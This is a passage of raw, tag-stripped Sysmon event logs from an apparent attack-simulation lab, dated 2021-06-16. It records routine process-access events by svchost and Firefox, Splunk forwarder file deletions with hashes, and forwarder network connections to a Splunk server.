10341000x8000000000000000104991Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104990Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.233{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104989Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.232{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104988Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.232{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104987Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.232{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104986Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.232{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104985Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:44.232{54715871-FD18-60C9-0D00-00000000CF01}908928C:\Windows\system32\svchost.exe{54715871-15B1-60CA-3C08-00000000CF01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151597Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.719{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151596Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.719{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151595Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.519{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba|C:\Program Files\Mozilla Firefox\xul.dll+2d7fa7f 10341000x8000000000000000151594Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.519{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1 10341000x8000000000000000151593Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.403{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d7f900|C:\Program Files\Mozilla Firefox\xul.dll+2d7f775|C:\Program Files\Mozilla Firefox\xul.dll+2d7f2f7|C:\Program Files\Mozilla Firefox\xul.dll+2d7edba 10341000x8000000000000000151592Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.403{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 10341000x8000000000000000151591Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.366{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151590Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.366{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151589Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:44.284{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BDE8C9F106C039C971E79D37D9650C2,SHA256=40F6A84D1CE63210CA9C7AACB5871FC45AD3E8996D182444D488CD339A3E390C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105014Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:45.324{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9E6AA5E13A86BFA8F138A13C01260E2,SHA256=30BC59C79A026E048301E978C7F39052C0CDE7332CCD93F0589E146FBCCED40F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151604Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:43.986{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58411-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000151603Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.687{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151602Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.633{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151601Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.382{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+16a060f|C:\Program Files\Mozilla Firefox\xul.dll+68a670|C:\Program Files\Mozilla Firefox\xul.dll+179b3f2|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992|C:\Program Files\Mozilla Firefox\xul.dll+2bbbae1|C:\Program Files\Mozilla Firefox\xul.dll+2bbad50|C:\Program Files\Mozilla Firefox\xul.dll+61e011|C:\Program Files\Mozilla Firefox\xul.dll+2d7a6fa|C:\Program Files\Mozilla Firefox\xul.dll+2d85d07|C:\Program Files\Mozilla Firefox\xul.dll+da5ebb|C:\Program Files\Mozilla Firefox\xul.dll+4025f|C:\Program Files\Mozilla Firefox\xul.dll+1230b8e 10341000x8000000000000000151600Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.381{39BD8DE3-131D-60CA-0B01-00000000D101}11921152C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3ecf51|C:\Program Files\Mozilla Firefox\xul.dll+1203781|C:\Program Files\Mozilla Firefox\xul.dll+1234ce9|C:\Program Files\Mozilla Firefox\xul.dll+1234c09|C:\Program Files\Mozilla Firefox\xul.dll+12323e0|C:\Program Files\Mozilla Firefox\xul.dll+12328f4|C:\Program Files\Mozilla Firefox\xul.dll+16ba421|C:\Program Files\Mozilla Firefox\xul.dll+689569|C:\Program Files\Mozilla Firefox\xul.dll+689474|C:\Program Files\Mozilla Firefox\xul.dll+68925d|C:\Program Files\Mozilla Firefox\xul.dll+688e64|C:\Program Files\Mozilla Firefox\xul.dll+179b3d3|C:\Program Files\Mozilla Firefox\xul.dll+179b324|C:\Program Files\Mozilla Firefox\xul.dll+6878f8|C:\Program Files\Mozilla Firefox\xul.dll+1797c17|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+17a1ea8|C:\Program Files\Mozilla Firefox\xul.dll+1795f16|C:\Program Files\Mozilla Firefox\xul.dll+17963f3|C:\Program Files\Mozilla Firefox\xul.dll+2ff7916|C:\Program Files\Mozilla Firefox\xul.dll+64a53d|C:\Program Files\Mozilla Firefox\xul.dll+640992 23542300x8000000000000000151599Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.302{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A744786C61D800B698E64D127D422FE,SHA256=60776C67DD28DB4AFC9C97A6D2AC76F69A07CEA66BCC0B9C3E83B8D8E74050D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151598Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:45.183{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6F5D0E37C002CF87FC214D2BBB77618A,SHA256=BC7C0864A105FCC2C0D74140CA7216C1CC47838C96D5B63A210DF2F0CE56CEDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105015Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:46.639{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB6C4343B918E01719436B76C25204DB,SHA256=229D8BF2B3DD34F8224B8C23FFA8BC808E098EA499F7B77E962E8427BAA46A79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151605Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:46.308{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A3C76466F74C1D68F8D509BEA4195A5,SHA256=77492695E1208F04F94C986CA85C43530A7902C4870BFF36EFE6869ADD9EC6FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151606Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:47.308{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=499949E039B6F5B4F1936F3043E9ED87,SHA256=93823F97715316D30869221487E6F20702B388EC9BC24CDAD97C468CA94A2E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105016Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:48.045{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=118390D7C62E503481A183C80EAD4820,SHA256=0EDB33791499D628EF3D253F240F53A57728827283B8D94AC8A45C8A11966172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151607Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:48.323{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00F29AE5C6C35C0D34ED67C5A091470D,SHA256=08D3E1C1F804D3EC21A78F2149FCFA81D000D116B4C19B8467C2F4E55B28E9E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105018Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:47.755{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55426-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105017Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:49.409{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=871FDF17B5AAA66571144FBC7BF90428,SHA256=8B5003627510A352CD87E58C9ECCEA87FF21C81AE2BC6D7BDED2DEE3C1EB44F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151641Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.754{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=E841845D2632C8197499347A8197F545,SHA256=47BC3DD0B78FF5AA3D3D54ABCF09EB34F08A3250506B72D9354A8F3D34661C05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151640Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.754{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program 